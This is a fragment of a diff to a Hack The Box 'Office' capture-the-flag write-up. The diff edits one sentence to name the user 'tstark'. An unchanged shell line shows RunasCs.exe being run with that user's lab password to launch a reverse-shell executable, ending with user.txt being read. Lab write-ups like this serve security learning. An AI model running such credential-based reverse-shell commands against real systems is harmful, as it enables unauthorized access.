xpnt0/xpnt0.github.io/_posts/2024-06-22-HTB-Writeup-Office.md

 >![](/assets/images/HTB-Writeup-Office/Pasted image 20240619163017.png)
 {: .prompt-info }

-- With all that done, he executed `RunasCs.exe`, received the reverse shell, and was able to read `user.txt`.
+- With all that done, he executed `RunasCs.exe`, received the reverse shell as the user `tstark`, and was able to read `user.txt`.

 ```shell
 c:\windows\tasks\RunasCs.exe tstark playboy69 c:\windows\tasks\revshmet.exe